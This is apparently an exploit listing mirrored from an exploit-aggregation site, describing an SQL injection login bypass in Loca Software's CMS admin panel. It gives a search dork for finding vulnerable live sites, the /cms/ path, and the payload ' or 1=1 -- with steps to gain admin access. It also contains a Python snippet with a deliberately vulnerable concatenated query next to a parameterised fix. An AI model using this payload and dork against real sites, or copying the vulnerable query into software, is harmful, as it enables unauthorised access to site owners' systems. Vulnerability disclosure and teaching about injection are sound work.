Loca Software - Sql Injection/Admin Panel Bypass

CVE: Not specified
Category: CWE-89
Price: Not specified
Severity: High
Author: Not specified
Risk: High
Exploitation Type: Local
Date: 2024-02-03

Our sensors found this exploit at:

Below is a copy:

TITLE: Loca Software - Sql Injection/Admin Panel Bypass
# Exploit Author: Onur Kara (root9ext)
# Service Provider: LocaSoftware
# Vulnerable URL: /cms/
# Dork: intext:"bu web sitesi LOCA YAZILIM BLM TEK. LTD. T."
# Vulnerability Type: SQL Bypass
# Severity: Critical
Vulnerability Description:
A critical SQL injection vulnerability has been identified in the admin panel login functionality of Loca Software's CMS, specifically within the /cms/ directory. Because the login form's input is placed directly into the authentication SQL query, an attacker can inject SQL that alters the query's logic and bypass the authentication check, resulting in unauthorized access to the admin panel.
Proof of Concept (PoC):
1. Visit the admin login page, typically located at:
2. Input the following payload in the username and password fields:
' or 1=1 --
' or 1=1 --
3. Submit the form.
4. Observe that the admin panel is accessible without redirection, indicating successful authentication bypass.
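As an added illustration (not code from this advisory or from Loca Software), the following Python/SQLite snippet reproduces the bug class behind this bypass: a login query built by string concatenation, shown beside the parameterised fix. The table, the account and the function names are constructed for the example.

```python
import sqlite3


def make_db():
    # Constructed sample table; real systems store password hashes, not
    # plaintext, but that is orthogonal to the injection shown here.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")
    conn.commit()
    return conn


def build_vulnerable_query(username, password):
    # The pattern the advisory describes: user input spliced into SQL text.
    return ("SELECT username FROM users WHERE username = '" + username
            + "' AND password = '" + password + "'")


def login_vulnerable(conn, username, password):
    # With "' or 1=1 --" the query becomes
    #   ... WHERE username = '' or 1=1 --' AND password = ...
    # The OR makes the predicate true and the comment discards the rest,
    # so the first row (the admin account) is returned.
    row = conn.execute(build_vulnerable_query(username, password)).fetchone()
    return row is not None


def login_fixed(conn, username, password):
    # Parameterised query: input is bound as a value and never parsed as
    # SQL, so the same payload simply fails to match any username.
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    payload = "' or 1=1 --"
    print("vulnerable:", login_vulnerable(make_db(), payload, payload))
    print("fixed:", login_fixed(make_db(), payload, payload))
```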
# Disclaimer: This PoC is for educational purposes only. Unauthorized access to systems or applications is illegal.
Telegram: @rootninext
